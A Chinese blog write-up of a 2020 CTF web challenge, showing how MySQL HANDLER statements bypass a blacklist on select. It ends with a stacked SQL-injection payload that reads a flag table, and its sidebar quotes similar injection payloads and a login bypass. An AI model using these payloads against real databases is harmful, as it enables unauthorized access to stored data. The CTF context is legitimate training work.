[原题复现][2020i春秋抗疫赛] WEB blanklist(SQL堆叠注入、handler绕过)

最新推荐文章于 2023-07-22 14:55:28 发布
最新推荐文章于 2023-07-22 14:55:28 发布
阅读量770 收藏 2
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43818995/article/details/104454354
版权

简介

今天参加i春秋新春抗疫赛 一道web没整出来 啊啊啊 好垃圾啊啊啊啊啊啊啊  晚上看群里赵师傅的buuoj平台太屌了分分钟上线 然后赵师傅还分享了思路用handler语句绕过select过滤。。。。

原题复现:

 考察知识点:SQL注入漏洞-堆叠注入、注入绕过

 线上平台:https://buuoj.cn(北京联合大学公开的CTF平台) 榆林学院内可使用信安协会内部的CTF训练平台找到此题

简介

 基础思路参考:https://www.cnblogs.com/xhds/p/12269987.html

与上述例子不同的地方就是黑名单过滤 过滤了我的知识范围之内所有能用的  各种绕过都不行 赛后才看大佬们分享用handler handler 卧槽我都没听过 啊啊啊啊啊好垃圾!垃圾!

handler语句代替select查询

mysql除可使用select查询表中的数据,也可使用handler语句,这条语句使我们能够一行一行的浏览一个表中的数据,不过handler语句并不具备select语句的所有功能。它是mysql专用的语句,并没有包含到SQL标准中。

 语法结构:

HANDLER tbl_name OPEN [ [AS] alias]

HANDLER tbl_name READ index_name { = | <= | >= | < | > } (value1,value2,...)
    [ WHERE where_condition ] [LIMIT ... ]
HANDLER tbl_name READ index_name { FIRST | NEXT | PREV | LAST }
    [ WHERE where_condition ] [LIMIT ... ]
HANDLER tbl_name READ { FIRST | NEXT }
    [ WHERE where_condition ] [LIMIT ... ]

HANDLER tbl_name CLOSE

如:通过handler语句查询users表的内容

handler users open as yunensec; #指定数据表进行载入并将返回句柄重命名
handler yunensec read first; #读取指定表/句柄的首行数据
handler yunensec read next; #读取指定表/句柄的下一行数据
handler yunensec read next; #读取指定表/句柄的下一行数据
...
handler yunensec close; #关闭句柄

 引用:https://xz.aliyun.com/t/7169#toc-47

 这道题的最终payload:

1';handler FlagHere open;handler FlagHere read first;#

 

 

笑花大王
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
2020i—VISTA自动驾驶汽车挑战赛江淮汽车实力斩获多项大奖.pdf
09-20
2020i—VISTA自动驾驶汽车挑战赛江淮汽车实力斩获多项大奖.pdf
【i春秋 CTF大本营 > 竞赛训练营 > CTF训练】—— Writeup 题解 (按答对人数排序)
algae
08-05 735
待补充整理ing
sql注入--handler语句--一文详细解说其原理和方法
贤鱼的博客
09-20 655
handler 语句使用方法
sql注入方式及知识点总结(超详细)
最新发布
qq_67473072的博客
07-22 3402
sql注入方式及知识点总结(超详细)
SQL注入Handler命令和堆叠注入
2201_75316477的博客
03-16 607
mysql除可使用select查询表中的数据,也可使用handler语句,这条语句使我们能够一行一行的浏览一个表中的数据,不过handler语句并不具备select语句的所有功能。它是mysql专用的语句,并没有包含到SQL标准中。HANDLER语句提供通往表的直接通道的存储引擎接口,可以用于MyISAM和InnoDB表。
Web安全漏洞原理——SQL注入
changyu233的博客
04-17 3323
Web安全漏洞原理——SQL注入 SQL注入 原理 ​ 由于程序员对插入SQL语句的用户输入参数检查不严格,导致的恶意SQL命令被插入语句并执行。 ​ 例如: ​ 原始查询语句为 select * from user where id=$value ​ $value为用户输入变量,由于没有过滤,在用户输入 1 and 1=2时 ​ 查询语句变为 select * from user where id=1 and 1=2,返回永假页面。 SQL数据库重要信息 MySQL数据库 默认数据库: ​ i
crazepony芯片资料_c2020i芯片资料_i2c_
09-30
软件模拟I2C功能,很多功能模块啊,可以下载直接使用
AlgorithmsUN2020I1
03-15
AlgorithmsUN2020I1
Mobile Converter v1.1 汉化特别版
12-31
Elecard Mobile Converter 能够将任何的...等等)、移动设备(Nokia 9500,Qtek 2020i)、以及基于 Symbian OS 7.0 以上版本或 Windows Mobile 2003 以上版本的移动设备。 Code: A1396409DCAF68B18534D0D55BCAE9D8
WA2600-胖Ap
10-03
HUAWEI 2020I FAT-Ap,此内容是解决掉了apple设备的掉线,无法上网的问题,使用过程中在7台机器测试,OK完美
.net SQL注入,使用 HttpHandler
05-12
.net SQL注入 ,使用 HttpHandler
[GYCTF2020]Blacklist 使用handler函数进行sql注入
EC_Carrot的博客
10-26 383
[GYCTF2020]Blacklist 前言 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! 参考了高诺琪师傅的文章:https://www.cnblogs.com/gaonuoqi/p/12398554.html 一、收集信息 过滤了很多东西,过滤了prepare预编译用不了,过滤了alter也是用不了改表、列名。 但可以查看一下表名 1';show tables;# 有两个表,查看一下FlagH
i春秋ctf夺旗赛(第四季)wirteup——misc
jammny
01-03 3075
前言:这次参加了i春秋ctf夺旗赛,misc类型一共有两道题。在这里跟大家分享一下解题步骤以及思路。 第一道题,XImg 下载文件解压后,得到一张png图片 这道题考察是图片隐写。图片隐写是misc常见的题型之一,接下来我会详细讲解一下解题步骤。 工具:stegsovle 1、把图片放到stegsovle分析,程序最下面有两个小按钮,不断点击直到得到一个被隐藏的二维码。 2、按...
Blacklist堆叠注入handler代替select
weixin_43610673的博客
03-04 716
测试:1 测试:1’ //有报错 测试发现union select语句可以回显出waf 利用堆叠注入查表1’;show tables;–+ // ; 结束上一条sql语句,再继续构造下一条语句。堆叠注入的局限性在于并不是每一个环境下都可以执行,可能受到API或者数据库引擎不支持的限制。 查字段1’;show columns from FlagHere;–+ 1’;handler F...
i春秋2020新春疫战 SQL注入类型 writepup
a3320315的博客
02-24 948
招聘简历 这道题目是比较常见的bool注入 打开题目是一个注册登录界面 我们先尝试一下有没有注入点 我们先注册一个账号 这个时候我们在登录页面试一下有没有注入点 很明显的bool注入,1=1是恒成立的,如果and后面的条件不成立,就会返回登录失败~~ exp: # encoding=utf-8 import requests url = 'http://d3be80acd6b647538ef87...
CTF中SQL注入常见题型整理
热门推荐
test
10-10 11万+
前言 正文 无过滤带回显的情况 可能使用到的工具:firefox、hackbar for firfox、sqlmap for linux 手工注入 bugku的环境 在这一环境中的主要是通过post方式传入一个参数id来查询数据库内容。 首先判断sql语句闭合方式 当在id的值后面加上'时,界面无回显,可以判断后端的sql语句应该是 select xxxx from xxxx where...
i春秋 2020新春战“疫”大赛(web部分)
qq_42812036的博客
02-25 789
ezupload 上传一句话,蚁剑直连,bash直接cat /flag,说没权限折腾了下Linux提权,大马提权。 payload: cd / cat /readflag : ( 简单的招聘系统 payload admin' or 1# 进入admin,成功访问招聘界面blank page界面 key处存在sql注入 有5个字段,显位在2 可以猜测后端查询语句可能类似: selec...
一天一道ctf 第19天(handler sql注入,.htaccess文件上传)
scrawman的博客
04-05 192
[GYCTF2020]Blacklist 一个小知识点,题目和之前强网杯的随便注差不多,只是过滤的东西多了很多,那就不能更改表名了。这里用的是handler语句 1';handler FlagHere open;handler FlagHere read first;handler FlagHere close;# [MRCTF2020]你传你????呢 这题和之前做过的一道文件上传题很像,都是先上传一个配置文件为之后上传的一句话木马开启一个后门(除了作者是个祖安以外)之前一道题传的是.user.in
SQL注入堆叠注入/预处理/handler-[强网杯 2019]随便注 1
小龙在线
09-15 1771
介绍 所谓堆叠注入,就是把多条完整的SQL语句用分号;分隔开,而不是用union或union all连接起来。 在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。而union injection(联合注入)也是将两条语句合并在一起,两者之间有什么区别么?区别就在于union 或者union all执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是任意的语句。例如以下这个例子。用
i春秋 “百度杯”CTF比赛 2017 二月场 Web writeup
Senimo
03-28 1159
i春秋 “百度杯”CTF比赛 2017 二月场 Web writeup爆破-1爆破-2爆破-3includeZoneOneThink 爆破-1 分值:10分 类型:MiscWeb 题目内容:flag就在某六位变量中。 启动靶机,打开题目: 进入页面为一段源码,分析代码: 包含flag.php文件 需要传入变量hello的值 正则表达式匹配:一个或多个[A-Za-z0-9_] var_dump(...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值